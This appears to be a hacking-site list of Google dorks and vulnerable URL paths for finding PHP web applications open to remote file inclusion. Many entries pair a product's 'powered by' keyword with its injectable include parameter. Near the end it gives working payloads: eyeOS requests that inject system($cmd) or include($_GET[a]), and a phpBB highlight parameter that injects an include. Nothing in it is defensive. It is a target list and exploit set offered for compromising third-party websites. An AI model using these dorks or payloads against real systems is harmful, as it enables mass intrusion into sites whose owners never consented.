/index.php?id=&amp;lang= .php?id="&#13;
index.php?id=&amp;lang= "index.php?id="&#13;
index.php?id=&amp;lang= ".php?id="&#13;
/index.php?id=&amp;page= index.php?id="&#13;
/index.php?id=&amp;page= .php?id="&#13;
index.php?inc= .php?inc="&#13;
index.php?ir= ".php?ir="&#13;
/index.php?lang=en&amp;cat= index.php?lang="&#13;
/index.php?lang=en&amp;cat= .php?lang="&#13;
/index.php?lang=en&amp;page= index.php?lang="&#13;
/index.php?lang=en&amp;page= .php?lang="&#13;
/index.php?lang=en&amp;page= index.php?lang=&#13;
index.php?lang=en&amp;page= index.php?lang=&#13;
/index.php?lang=en&amp;page= .php?lang=&#13;
index.php?lang=en&amp;page= .php?lang=&#13;
index.php?lang= "index.php?lang="&#13;
index.php?lang= index.php?lang=&#13;
index.php?lang=&amp;page= index.php?lang=&#13;
index.php?lang=&amp;page= .php?lang=&#13;
index.php?lg= "index.php?lg="&#13;
index.php?lg= index.php?lg=&#13;
index.php?lk= .php?lk="&#13;
/index.php?ln= .php?ln=&#13;
index.php?lng= "index.php?lng="&#13;
index.php?lng= index.php?lng=&#13;
index.php?ln= "index.php?ln="&#13;
index.php?ln= index.php?ln=&#13;
index.php?ln= ".php?ln="&#13;
index.php?lnk= index.php?lnk=&#13;
index.php?lnk= .php?lnk=&#13;
index.php?lnk= "index.php?lnk="&#13;
index.php?lnk= ".php?lnk="&#13;
index.php?ln= .php?ln=&#13;
index.php?loca= index.php?loca=&#13;
/index.php?loc= .php?loc="&#13;
index.php?loca= .php?loca=&#13;
/index.php?loc=&amp;cat= index.php?loc="&#13;
/index.php?loc=&amp;cat= .php?loc="&#13;
/index.php?loc=&amp;lang= index.php?loc="&#13;
/index.php?loc=&amp;lang= .php?loc="&#13;
/index.php?loc=&amp;page= index.php?loc="&#13;
/index.php?loc= .php?loc=&#13;
/index.php?loc=start&amp;page= index.php?loc="&#13;
index.php?ltr= index.php?ltr="&#13;
index.php?ltr= .php?ltr="&#13;
index.php?main= .php?main="&#13;
index.php?m= index.php?m="&#13;
index.php?meio= index.php?meio="&#13;
index.php?meio= index.php?meio=&#13;
index.php?meio= .php?meio=&#13;
index.php?meio= .php?meio="&#13;
index.php?mf= index.php?mf=&#13;
index.php?mf= .php?mf=&#13;
index.php?mf= .php?mf="&#13;
index.php?mid= index.php?mid="&#13;
index.php?mid= index.php?mid=&#13;
index.php?mid= .php?mid=&#13;
index.php?mid= .php?mid="&#13;
index.php?middle= index.php?middle="&#13;
index.php?middle= index.php?middle=&#13;
index.php?middle= .php?middle="&#13;
index.php?mn= index.php?mn="&#13;
index.php?mn= .php?mn="&#13;
index.php?mod= index.php?mod="&#13;
index.php?mod= .php?mod="&#13;
index.php?new= index.php?new="&#13;
index.php?news= index.php?news="&#13;
index.php?page1= index.php?page1="&#13;
index.php?page1= .php?page1="&#13;
index.php?page= php5?page=&#13;
index.php?page= index.php?page=&#13;
index.php?page=&amp;lang= index.php?p=&#13;
index.php?page=&amp;lang= index.php?pag=&#13;
index.php?page=&amp;lang= index.php?page=&#13;
index.php?page=&amp;lang= index.php?pg=&#13;
index.php?page=&amp;lang= .php?p=&#13;
index.php?page=&amp;lang= .php?pag=&#13;
index.php?page=&amp;lang= .php?page=&#13;
index.php?page=&amp;lang= .php?pg=&#13;
index.php?pageN= .php?pageN="&#13;
index.php?pager= index.php?pager=&#13;
index.php?pager= .php?pager=&#13;
index.php?pagina= index.php?pagina=&#13;
index.php?pag= "index.php?pag="&#13;
index.php?pag= index.php?pag=&#13;
index.php?p= index.php?p="&#13;
index.php?pg= "index.php?pg="&#13;
index.php?pg= index.php?pg=&#13;
index.php?prod= .php?prod="&#13;
index.php?prod= .php?product="&#13;
index.php?product= .php?prod="&#13;
index.php?product= .php?product="&#13;
index.php?r= index.php?r="&#13;
index.php?s= index.php?s="&#13;
index.php?s= index.php?s=&#13;
index.php?s= .php?s=&#13;
index.php?s= .php?s="&#13;
index.php?secao= index.php?secao=&#13;
index.php?secao= .php?secao=&#13;
index.php?secao= "index.php?secao="&#13;
index.php?secao= ".php?secao="&#13;
/index.php?seccion= /index.php?seccion=&#13;
/index.php?seccion= .php?seccion=&#13;
index.php?sec= "index.php?sec="&#13;
index.php?sec= index.php?sec=&#13;
/index.php?seite= /index.php?seite=&#13;
/index.php?seite= .php?seite=&#13;
index.php?select= .php?select="&#13;
index.php?select= index.php?select=&#13;
index.php?select= .php?select=&#13;
index.php?set= index.php?set="&#13;
index.php?set= index.php?set=&#13;
index.php?set= .php?set=&#13;
index.php?set= .php?set="&#13;
index.php?sf= index.php?sf="&#13;
index.php?show= .php?show="&#13;
index.php?s= "index.php?s="&#13;
index.php?s= index.php?s=&#13;
index.php?sit= index.php?sit="&#13;
index.php?sit= .php?sit="&#13;
/index.php?slang= /index.php?slang=&#13;
/index.php?slang= "index.php?slang="&#13;
/index.php?slang= .php?slang=&#13;
/index.php?slang= ".php?slang="&#13;
index.php?sort= .php?sort="&#13;
index.php?spage= index.php?spage="&#13;
index.php?spage= index.php?spage=&#13;
index.php?spage= .php?spage=&#13;
index.php?spage= .php?spage="&#13;
index.php?ss= index.php?ss="&#13;
index.php?ss= .php?ss="&#13;
index.php?st= index.php?st="&#13;
index.php?sub= index.php?sub="&#13;
index.php?sub= index.php?sub=&#13;
index.php?sub= .php?sub=&#13;
index.php?sub= "index.php?sub="&#13;
index.php?sub= index.php?sub=&#13;
index.php?sub= "index.php?sub=""&#13;
index.php?sub= "index.php?sub="&#13;
index.php?sub= ".php?sub="&#13;
index.php?subpage= index.php?subpage="&#13;
index.php?subpage= .php?subpage="&#13;
index.php?subp= index.php?subp="&#13;
index.php?subp= .php?subp="&#13;
index.php?table= index.php?table=&#13;
index.php?table= .php?table=&#13;
index.php?t= index.php?t="&#13;
index.php?task= index.php?task=&#13;
index.php?task= .php?task=&#13;
index.php?term= .php?term="&#13;
index.php?textfield= .php?textfield="&#13;
index.php?theme= index.php?theme=&#13;
index.php?theme= .php?theme=&#13;
index.php?theme= .php?theme=&#13;
index.php?trans= index.php?trans="&#13;
index.php?trans= .php?trans="&#13;
index.php?v= index.php?v="&#13;
index.php?ver= index.php?ver="&#13;
index.php?ver= index.php?ver=&#13;
index.php?ver= .php?ver=&#13;
index.php?ver= .php?ver="&#13;
index.php?ver= .php?ver=&#13;
/index.php?vis= /index.php?vis=&#13;
/index.php?vis= .php?vis=&#13;
index.php?way= index.php?way=&#13;
index.php?way= .php?way=&#13;
index.php?wpage= index.php?wpage="&#13;
index.php?wpage= .php?wpage="&#13;
info.php?ln= info.php?ln="&#13;
info.php?ln= info.php?ln=&#13;
info.php?ln= .php?ln="&#13;
/interna.php?meio= .php?meio="&#13;
kalender.php?vis= kalender.php"&#13;
kalender.php?vis= kalender.php?vis="&#13;
kalender.php?vis= .php?vis="&#13;
lang.php?arg= .php?arg=&#13;
lang.php?arq= .php?arq=&#13;
lang.php?lk= .php?lk="&#13;
lang.php?ln= .php?ln=&#13;
lang.php?subpage= .php?subpage="&#13;
lang.php?subp= .php?sub="&#13;
lang.php?subp= .php?subp="&#13;
/lib/db/ez_sql.php?lib_path= ttCMS&#13;
/lib/db/ez_sql.php?lib_path= ttCMS &lt;= v4&#13;
/lib/static/header.php?set_menu= iPhoto Album&#13;
/lib/static/header.php?set_menu= iPhotoAlbum&#13;
/lib/static/header.php?set_menu= iPhotoAlbum v1.1&#13;
link.php?do= .php?do="&#13;
list.php?product= .php?product=&#13;
list.php?table= .php?table=&#13;
ln.php?ln= .php?ln=&#13;
loc.php?l= .php?l="&#13;
loc.php?l= .php?loc="&#13;
loc.php?lang= .php?lang="&#13;
loc.php?lang= .php?loc="&#13;
loc.php?loc= loc.php?loc="&#13;
loc.php?loc= .php?loc="&#13;
login.php?loca= .php?loca=&#13;
magazine.php?inc= .php?inc="&#13;
main1.php?arg= .php?arg=&#13;
main1.php?ln= .php?ln=&#13;
main2.php?ln= .php?ln=&#13;
main.html.php?seite= .php?seite=&#13;
main.php3?act= main.php3?act="&#13;
main.php3?act= .php3?act="&#13;
main.php5?page= .php5?id=&#13;
main.php?a= .php?a="&#13;
main.php?arg= .php?arg=&#13;
main.php?ba= main.php?ba="&#13;
main.php?ba= .php?ba="&#13;
main.php?command= main.php?command="&#13;
main.php?command= .php?command="&#13;
main.php?d1= main.php?d1="&#13;
main.php?d1= .php?d1="&#13;
main.php?f1= .php?f1="&#13;
main.php?fset= .php?fset="&#13;
main.php?inc= .php?inc="&#13;
main.php?ln= .php?ln=&#13;
main.php?ltr= .php?ltr="&#13;
main.php?s= main.php?s="&#13;
main.php?s= main.php?s=&#13;
main.php?s= .php?s=&#13;
main.php?s= .php?s="&#13;
main.php?sit= .php?sit="&#13;
main.php?table= .php?table=&#13;
main.php?vis= main.php?vis="&#13;
main.php?vis= main.php?vis=&#13;
main.php?vis= .php?vis="&#13;
mai.php?act= mai.php?act="&#13;
mai.php?act= mai.php?act=&#13;
mai.php?loc= mai.php?loc="&#13;
mai.php?loc= mai.php?loc=&#13;
mai.php?src= mai.php?src="https://anonyviet.com/dork-sql-2015/mai.php?src= mai.php?src=&#13;
map.php?loc= map.php?loc=&#13;
middle.php?file="middle.php?file="&#13;
middle.php?file= "middle.php?page="&#13;
middle.php?file= ".php?file="&#13;
middle.php?file= ".php?page="&#13;
middle.php?file= middle.php?file=&#13;
middle.php?file= middle.php?page=&#13;
middle.php?file= .php?file=&#13;
middle.php?file= .php?page=&#13;
middle.php?page= "middle.php?page="&#13;
middle.php?page= ".php?page="&#13;
middle.php?page= middle.php?page=&#13;
middle.php?page= .php?page=&#13;
misc.php?do= .php?do="&#13;
mod.php?mod= mod.php?mod="&#13;
mod.php?mod= .php?mod="&#13;
module.php?mod= module.php?mod="&#13;
module.php?mod= .php?mod="&#13;
/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= PostGuestbook"&#13;
/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= "PostGuestbook"&#13;
/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= "PostGuestbook 0.6.1?&#13;
/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= PostGuestbook&#13;
/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= PostGuestbook 0.6.1&#13;
modul.php?mod= modul.php?mod="&#13;
modul.php?mod= .php?mod="&#13;
more.php?sub= "more.php?sub="&#13;
more.php?sub= more.php?sub=&#13;
nav.php?g= "nav.php?g="&#13;
nav.php?g= nav.php?g=&#13;
nav.php?go= "nav.php?go="&#13;
nav.php?go= nav.php?go=&#13;
nav.php?lk= .php?lk="&#13;
nav.php?ln= .php?ln=&#13;
nav.php?loc= nav.php&#13;
nav.php?loc= nav.php?loc=&#13;
nav.php?loc= .php?loc=&#13;
nav.php?nav= "nav.php?nav="&#13;
nav.php?nav= nav.php?nav=&#13;
nav.php?page= "nav.php?page="&#13;
nav.php?page= nav.php?page=&#13;
nav.php?pagina= "nav.php?pagina="&#13;
nav.php?pagina= nav.php?pagina=&#13;
nav.php?pag= "nav.php?pag="&#13;
nav.php?pag= nav.php?pag=&#13;
nav.php?pg= "nav.php?pg="&#13;
nav.php?pg= nav.php?pg=&#13;
nav.php?p= "nav.php?p="&#13;
nav.php?p= nav.php?p=&#13;
order.php?lang= order.php?lang=&#13;
order.php?list= order.php?list=&#13;
order.php?ln= order.php?ln=&#13;
order.php?l= order.php?l=&#13;
order.php?page= order.php?page=&#13;
order.php?pag= order.php?pag=&#13;
order.php?pg= order.php?pg=&#13;
order.php?p= order.php?p=&#13;
order.php?wp= order.php?wp=&#13;
order.php?wp= .php?wp=&#13;
/?page= .php5?id=&#13;
page.php5?id= page.php5?id=&#13;
page.php5?id= .php5?id=&#13;
page.php?arq= .php?arq=&#13;
page.php?ln= .php?ln=&#13;
page.php?p= page.php?p="&#13;
page.php?p= page.php?p=&#13;
page.php?p= .php?p=&#13;
page.php?p= .php?p="&#13;
page.php?s= page.php?s="&#13;
page.php?s= page.php?s=&#13;
page.php?s= .php?s=&#13;
page.php?s= .php?s="&#13;
/?pag= .php5?id=&#13;
/palportal/index.php?page= /palportal/&#13;
/palportal/index.php?page= pal portal&#13;
/?pg= .php5?id=&#13;
/?p= .php5?id=&#13;
p.php?p= .php?p=&#13;
p.php?p= .php?p="&#13;
p.php?p= p.php?p="&#13;
p.php?p= "p.php?p="&#13;
p.php?p= p.php?p=&#13;
presse.php?do= .php?do="&#13;
presse.php?do= presse.php?do="&#13;
print.php?pager= .php?pager=&#13;
print.php?pager= .php?pager=&#13;
print.php?pager= print.php?pager=&#13;
print.php?table= .php?table=&#13;
proddetail.php?prod= .php?prod="&#13;
prod.php?prod= .php?prod="&#13;
products.php?prod= .php?prod="&#13;
produit.php?prod= .php?prod="&#13;
produkt.php?prod= .php?prod="&#13;
/read.php?fpage= /read.php?fpage=&#13;
reports.php?sub= "reports.php?sub="&#13;
reports.php?sub= reports.php?sub=&#13;
rss.php?phpraid_dir= phpraid"&#13;
rss.php?phpraid_dir= phpraid&#13;
rss.php?phpraid_dir= ""$2-"&#13;
rss.php?phpraid_dir= "php raid"&#13;
rss.php?phpraid_dir= php raid&#13;
rss.php?phpraid_dir= phpraid&#13;
s1.php?ln= .php?ln=&#13;
search.php?exec= search.php?exec=&#13;
shop.php?prod= .php?prod="&#13;
shop.pl/page= shop.pl/page=&#13;
show.php?page1= .php?page1="&#13;
show.php?product= .php?product=&#13;
show.php?product= show.php?product=&#13;
side.php?arq= .php?arq=&#13;
side.php?table= .php?table=&#13;
side.php?vis= .php?vis=&#13;
side.php?vis= side.php?vis=&#13;
site.php?arq= .php?arq=&#13;
site.php?meio= .php?meio=&#13;
site.php?table= .php?table=&#13;
s.php?table= .php?table=&#13;
start.php?id= .php?id="&#13;
start.php?id= start.php?id="&#13;
start.php?id= start.php?id=&#13;
start.php?lang= .php?lang="&#13;
start.php?lang= start.php?lang="&#13;
start.php?lang= start.php?lang=&#13;
start.php?lang= .php?lang=&#13;
start.php?lang= start.php?lang=&#13;
start.php?mod= .php?mod="&#13;
start.php?mod= start.php?mod="&#13;
start.php?page= .php?page="&#13;
start.php?page= start.php?page="&#13;
start.php?page= start.php?page=&#13;
start.php?pag= start.php?pag=&#13;
start.php?pg= start.php?pg=&#13;
start.php?p= start.php?p=&#13;
start.php?s= .php?s="&#13;
start.php?s= start.php?s="&#13;
start.php?s= start.php?s=&#13;
start.php?s= start.php?s=&#13;
str.php?lang= str.php?lang=&#13;
str.php?ln= str.php?ln=&#13;
str.php?l= str.php?l=&#13;
str.php?page= str.php?page=&#13;
str.php?p= str.php?p=&#13;
sub.php?menu= "sub.php?menu="&#13;
sub.php?menu= sub.php?menu=&#13;
sub.php?s= "sub.php?s="&#13;
sub.php?s= sub.php?s=&#13;
sub.php?sub= "sub.php?sub="&#13;
sub.php?sub= sub.php?sub=&#13;
task.php?task= .php?task=&#13;
task.php?task= task.php?task=&#13;
/templates/mangobery/footer.sample.php?Site_Path= Mangobery&#13;
/templates/mangobery/footer.sample.php?Site_Path= Mangobery 0.5.5&#13;
/templates/mangobery/footer.sample.php?Site_Path= Mangobery-0.5.5&#13;
trans.php?trans= .php?trans="&#13;
trans.php?trans= trans.php?trans="&#13;
/trans/trans.php?trans=eng&amp;page= .php?trans="&#13;
/trans/trans.php?trans=en&amp;page= .php?trans="&#13;
/trans/trans.php?trans=fr&amp;page= .php?trans="&#13;
/trans/trans.php?trans=ko&amp;page= .php?trans="&#13;
/trans/trans.php?trans=&amp;page= .php?trans="&#13;
/trans/trans.php?trans=&amp;p= .php?trans="&#13;
view.php?sub= "view.php?sub="&#13;
view.php?sub= view.php?sub=&#13;
view.php?table= .php?table=&#13;
voir.php?inc= .php?inc="&#13;
werbungFrame.php?do= .php?do="&#13;
/ws/get_events.php?includedir= Web Calendar&#13;
/ws/get_events.php?includedir= WebCalendar&#13;
/ws/get_events.php?includedir= WebCalendar v0.9.45&#13;
/ws/get_reminders.php?includedir= WebCalendar&#13;
/ws/get_reminders.php?includedir= WebCalendar v0.9.45&#13;
/ws/login.php?includedir= WebCalendar&#13;
/ws/login.php?includedir= WebCalendar v0.9.45&#13;
ocp-103/index.php?req_path= ocPortal&#13;
images/evil.php?owned= e107&#13;
/modules/My_eGery/public/displayCategory.php?basepath=&#13;
/include/new-visitor.inc.php?lvc_include_dir=&#13;
/_functions.php?prefix=&#13;
/cpcommerce/_functions.php?prefix=&#13;
/modules/coppermine/themes/default/theme.php?THEME_DIR=&#13;
/eblog/blog.inc.php?xoopsConfig[xoops_url]=&#13;
/pm/lib.inc.php?pm_path=&#13;
/b2-tools/gm-2-b2.php?b2inc=&#13;
/modules/mod_mainmenu.php?mosConfig_absolute_path=&#13;
/modules/agendax/addevent.inc.php?agendax_path=&#13;
/includes/include_once.php?include_file=&#13;
/e107/e107_handlers/secure_img_render.php?p=&#13;
/shoutbox/expanded.php?conf=&#13;
/main.php?x=&#13;
/myPHPCalendar/admin.php?cal_dir=&#13;
/index.php/main.php?x=&#13;
/index.php?include=&#13;
/index.php?x=&#13;
/index.php?open=&#13;
/index.php?visualizar=&#13;
/template.php?pagina=&#13;
/index.php?pagina=&#13;
/index.php?inc=&#13;
/includes/include_onde.php?include_file=&#13;
/index.php?page=&#13;
/index.php?pg=&#13;
/index.php?show=&#13;
/db.php?path_local=&#13;
/index.php?site=&#13;
/htmltonuke.php?filnavn=&#13;
/livehelp/inc/pipe.php?HCL_path=&#13;
/hcl/inc/pipe.php?HCL_path=&#13;
/inc/pipe.php?HCL_path=&#13;
/support/faq/inc/pipe.php?HCL_path=&#13;
/help/faq/inc/pipe.php?HCL_path=&#13;
/helpcenter/inc/pipe.php?HCL_path=&#13;
/live-support/inc/pipe.php?HCL_path=&#13;
/gnu3/index.php?doc=&#13;
/gnu/index.php?doc=&#13;
/phpgwapi/setup/tables_update.inc.php?appdir=&#13;
/forum/inst.php?phpbb_root_dir=&#13;
/includes/calendar.php?phpc_root_path=&#13;
/includes/setup.php?phpc_root_path=&#13;
/inc/authform.inc.php?path_pre=&#13;
/include/authform.inc.php?path_pre=&#13;
index.php?sec=&#13;
index.php?filename=&#13;
index.php?dir=&#13;
index.php?document=&#13;
index.php?view=&#13;
*.php?sel=&#13;
*.php?session=&amp;content=&#13;
*.php?locate=&#13;
*.php?place=&#13;
*.php?layout=&#13;
*.php?go=&#13;
*.php?catch=&#13;
*.php?mode=&#13;
*.php?name=&#13;
*.php?loc=&#13;
*.php?f=&#13;
*.php?inf=&#13;
*.php?pg=&#13;
*.php?load=&#13;
*.php?naam=&#13;
/index.php?page= site:*.dk&#13;
/index.php?file= site:*.dk&#13;
INURL OR INURL WITH:&#13;
/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=&#13;
/includes/header.php?systempath=&#13;
/Gery/displayCategory.php?basepath=&#13;
/index.inc.php?PATH_Includes=&#13;
/ashnews.php?pathtoashnews=&#13;
/ashheadlines.php?pathtoashnews=&#13;
/demo/includes/init.php?user_inc=&#13;
/jaf/index.php?show=&#13;
/inc/shows.inc.php?cutepath=&#13;
/poll/admin/common.inc.php?base_path=&#13;
/pollvote/pollvote.php?pollname=&#13;
/sources/post.php?fil_config=&#13;
/bb_lib/checkdb.inc.php?libpach=&#13;
/include/livre_include.php?no_connect=lol&amp;chem_absolu=&#13;
/index.php?from_market=Y&amp;pageurl=&#13;
/pivot/modules/module_db.php?pivot_path=&#13;
/derniers_commentaires.php?rep=&#13;
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=&#13;
/coppermine/themes/maze/theme.php?THEME_DIR=&#13;
/mylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=&#13;
/mylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=&#13;
/agendax/addevent.inc.php?agendax_path=&#13;
/modules/xoopsgery/upgrade_album.php?GERY_BASEDIR=&#13;
/default.php?page=&#13;
/index.php?action=&#13;
/index1.php?p=&#13;
/index2.php?x=&#13;
/index2.php?content=&#13;
/index.php?conteudo=&#13;
/index.php?cat=&#13;
/modules/xgery/upgrade_album.php?GERY_BASEDIR=&#13;
/library/editor/editor.php?root=&#13;
/library/lib.php?root=&#13;
/zentrack/index.php?configFile=&#13;
/becommunity/community/index.php?pageurl=&#13;
/GradeMap/index.php?page=&#13;
/index4.php?body=&#13;
/side/index.php?side=&#13;
/es/index.php?action=&#13;
/index.php?main=&#13;
/html/page.php?page=&#13;
/page.php?view=&#13;
/index.php?menu=&#13;
/content.php?page=&#13;
/main_site.php?page=&#13;
/index.php?L2=&#13;
/main.php?page=&#13;
/tutorials/print.php?page=&#13;
/index.php?inter_url=&#13;
/index2.php?menu=&#13;
/index.php?level=&#13;
/index1.php?main=&#13;
/index1.php?nav=&#13;
/index1.php?link=&#13;
/index2.php?page=&#13;
/index.php?myContent=&#13;
/index.php?TWC=&#13;
/index.php?sec=&#13;
/index.php?babInstPath=&#13;
/main.php?body=&#13;
/index.php?z=&#13;
/main.php?view=&#13;
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=&#13;
/index.php?file=&#13;
1. my_egery site:.org&#13;
2. xgery site:.org&#13;
3. coppermine site:.org&#13;
4. 4nAlbum site:.org&#13;
/modules/4nAlbum/public/displayCategory.php?basepath=&#13;
5. inurlP:NphpBB2 site:.org&#13;
6. ihm.php?p=&#13;
7. Keyword : "powered by MyLinks"&#13;
8. /modules.php?name=myguests&#13;
/modules/MyGuests/signin.php?_AMGconfig[cfg_serverpath]=&#13;
9. /Popper/index.php?&#13;
/Popper/index.php?childwindow.inc.php?form=&#13;
10. google = kietu/hit_js.php, kietu/hit_js.php&#13;
yahoo = by Kietu? v 3.2&#13;
/kietu/index.php?kietu[url_hit]=&#13;
11. keyword : "Powered by phpBB 2.0.6"&#13;
/html&amp;highlight=%2527.include($_GET[a]),exit.%2527&amp;a=&#13;
12. keyword : "powered by CubeCart 3.0.6"&#13;
13. keyword : "powered by paBugs 2.0 Beta 3?&#13;
14. powered by AshNews", AshNews atau /ashnews.php&#13;
15. keyword : /phorum/login.php&#13;
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=&#13;
16. ihm.php?p=*&#13;
14. keyword : "powered eyeOs"&#13;
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&amp;a=eyeOptions.eyeapp&amp;_SESSION%5busr%5d=root&amp;_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&amp;cmd=id&#13;
diganti dengan :&#13;
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&amp;a=eyeOptions.eyeapp&amp;_SESSION%5busr%5d=root&amp;_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5ba%5d);&amp;a=&#13;
15. .php?bodyfile=&#13;
16. /includes/orderSuccess.inc.php?glob=&#13;
17. forums.html&#13;
/modules.php?name=&#13;
18. /default.php?page=home&#13;
19. /folder.php?id=&#13;
20. main.php?pagina=&#13;
/paginedinamiche/main.php?pagina=&#13;
21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( *.edu.*/modules.php?name=myguests ) or ( "powered by MyGuests")&#13;
22. application.php?base_path=&#13;
/application.php?base_path=&#13;
23. inurlp:hplivehelper&#13;
/phplivehelper/initiate.php?abs_path=&#13;
24. inurlp:hpnuke&#13;
25. key word : "powered by Fantastic News v2.1.2"&#13;
/archive.php?CONFIG[script_path]=&#13;
26. keyword: "powered by smartblog" AND ?page=login&#13;
27. /forum/&#13;
/forum/admin/index.php?inc_conf=&#13;
28. keyword:"Powered By FusionPHP"&#13;
/templates/headline_temp.php?nst_inc=&#13;
29. shoutbox/expanded.php filetypep:hp&#13;
30. /osticket/&#13;
/osticket/include/main.php?config[search_disp]=true&amp;include_dir=&#13;
31. keyword : "Powered by iUser"&#13;
/common.php?include_path=&#13;
32. "static.php?load="&#13;
/static.php?load=&#13;
33. keyworld : /phpcoin/login.php&#13;
/phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=&#13;
34. keyworld: /phpGedview/login.php site:&#13;
/help_text_vars.php?dir&amp;PGV_BASE_DIRECTORY=&#13;
35. /folder.php?id=&#13;
/classes.php?LOCAL_PATH=&#13;
"/lire.php?rub="&#13;
"/os/pointer.php?url="&#13;
"folder.php?id="&#13;
"show.php?page="&#13;
"index2.php?DoAction="&#13;
"index.php?canal="&#13;
"index.php?screen="&#13;
"index.php?langc="&#13;
"index.php?Language="&#13;
"view.php?page="&#13;
dork: "powered by doodle cart"&#13;
rfi of this dork: enc/content.php?Home_Path=&#13;
dork: "Login to Calendar"&#13;
rfi of this dork: /embed/day.php?path=&#13;
dork: "powered by EQdkp"&#13;
rfi of this dork: /includes/dbal.php?eqdkp_root_path=&#13;
"template.php?goto="&#13;
"video.php?content="&#13;
"pages.php?page="&#13;
"index1.php?choix="&#13;
"index1.php?menu="&#13;
"index2.php?ascii_seite="&#13;
dork: surveys&#13;
rfi to this dork: /surveys/survey.inc.php?path=&#13;
"index.php?body="&#13;
dork: adobt sitel&#13;
rfi to this dork: /classes/adodbt/sql.php?classes_dir=&#13;
dork: "Powered By ScozNews"&#13;
rfi to this dork: /sources/functions.php?CONFIG[main_path]=&#13;
rfi to this dork: /sources/template.php?CONFIG[main_path]=&#13;
"kb_constants.php?module_root_path="&#13;
dork: mcf.php"&#13;
rfi to this dork: /mcf.php?content=&#13;
dork: "main.php?sayfa="&#13;
rfi to this dork: /main.php?sayfa=&#13;
dork: "MobilePublisherPHP"&#13;
rfi to this dork: /header.php?abspath=&#13;
dork: "powered by phpCOIN 1.2.3"&#13;
rfi to rhis dork: /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=&#13;
login.php?dir=&#13;
"index.php?go="&#13;
"index1.php?="&#13;
"lib/gore.php?libpath="&#13;
"index2.php?p="&#13;
/classes/adodbt/sql.php?classes_dir=&#13;
/classified_right.php?language_dir=&#13;
/sources/template.php?CONFIG[main_path]=&#13;
/sources/join.php?FORM[url]=owned&amp;CONFIG[captcha]=1&amp;CONFIG[path]=&#13;
/mcf.php?content=&#13;
/zipndownload.php?PP_PATH=&#13;
/administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=&#13;
impex/ImpExData.php?systempath=&#13;
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=&#13;
/login.php?dir=&#13;
/tags.php?BBCodeFile=&#13;
phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=&#13;
index1.php?=&#13;
main.php?id=&#13;
lib/gore.php?libpath=&#13;
news_detail.php?file=&#13;
old_reports.php?file=&#13;
index.php?nic=&#13;
homepage.php?sel=&#13;
index.php?sel=&#13;
components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=&#13;
main.php?pagina=&#13;
test.php?page=&#13;
index.php?lang=&#13;
index.php?_REQUEST=&amp;_REQUEST%5boption%5d=com_content&amp;_REQUEST%5bItemid%5d=1&amp;GLOBALS=&amp;mosConfig_absolute_path=&#13;
index.php?mode=&#13;
index.php?stranica=&#13;
index.php?sub=&#13;
index.php?t=&#13;
solpot.html?body=&#13;
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=&#13;
/tools/send_reminders.php?includedir=&#13;
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=&#13;
index.php?u=&#13;
administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=&#13;
administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=&#13;
/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=&#13;
administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=&#13;
show_news.php?cutepath=&#13;
page.php?doc=&#13;
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=&#13;
components/com_geria/geria.html.php?mosConfig_absolute_path=&#13;
/functions.php?include_path=&#13;
/modules/coppermine/include/init.inc.php?CPG_M_DIR=&#13;
/include/write.php?dir=&#13;
db.php?path_local=&#13;
index.php?file=&#13;
index.php?content=&#13;
index.php?kobr=&#13;
index.php?l=&#13;
index.php?a=&#13;
index.php?opcao=&#13;
index.php?conteudo=&#13;
index.php?meio=&#13;
index.php?inc=&#13;
index.php?c=&#13;
index.php?arquivo=&#13;
components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=&#13;
index.php?show=&#13;
index.php?dept=&#13;
index.php?inhalt=&#13;
principal.php?conteudo=&#13;
main.php?site=&#13;
template.php?name=&#13;
forum.php?act=&#13;
index2.php?content=&#13;
index.phpmain.php?x=&#13;
index.php?canal=&#13;
services.php?page=&#13;
index.php?Language=&#13;
video.php?content=&#13;
pages.php?page=&#13;
print.php?page=&#13;
show.php?page=&#13;
media.php?page=&#13;
index2.php?ascii_seite=&#13;
index2.php?DoAction=&#13;
index1.php?site=&#13;
main.php?link=&#13;
home.php?x=&#13;
/phpopenchat/contrib/yabbse/poc.php?sourcedir=&#13;
/squito/photolist.inc.php?photoroot=&#13;
/spid/lang/lang.php?lang_path=&#13;
/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=&#13;
/index.php?_REQUEST=&amp;_REQUEST[option]=com_content&amp;_REQUEST[Itemid]=1&amp;GLOBALS=&amp;mosConfig_absolute_path=&#13;
/app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH=&#13;
components/com_performs/performs.php?mosConfig_absolute_path=&#13;
/components/com_smf/smf.php?mosConfig_absolute_path=&#13;
/components/com_cpg/cpg.php?mosConfig_absolute_path=&#13;
administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=&#13;
/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=&#13;
